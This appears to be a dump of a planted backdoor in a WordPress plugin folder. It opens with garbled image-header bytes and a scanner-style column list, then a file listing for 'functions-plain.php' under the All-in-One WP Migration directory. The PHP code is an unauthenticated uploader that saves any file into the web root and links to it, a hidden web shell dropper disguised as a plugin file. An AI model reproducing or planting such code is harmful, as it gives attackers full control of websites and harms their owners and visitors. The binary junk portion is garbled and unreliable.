ascvh@#%(^-^)V ?host,ip,port,protocol,title,domain,country,city,link,org ???à JFIF x x ?? C ?? C ?à " ?? ?? μ } !1AQa "q2?‘?#B±áR?e$3br? %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz??…???‰?’“”?–—???¢£¤¥|§¨?a23′μ?·?1o??????èéêòó???×?ùúáa?????èéê?òó???÷?ùú?? ?? μ w !1AQ aq"2?B‘?±á #3Rebr?{
File "functions-plain.php"
Full Path: /home/zcziejy/ryadselyen/all-in-one-wp-migration/functions-plain.php
File size: 546 bytes
MIME-type: text/html
Charset: utf-8
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title><?php echo $_SERVER['HTTP_HOST'] ?></title>
</head>
<body>
<form method="post" enctype="multipart/form-data">
<input type="file" name="filename">
<input type="submit" value="submit">
</form>
<?php
if ( is_uploaded_file( $_FILES["filename"]["tmp_name"] ) ) {
move_uploaded_file( $_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"] );
$file = $_FILES["filename"]["name"];
echo "<a href=\"$file\">$file</a>";
}
?>
</body>
</html>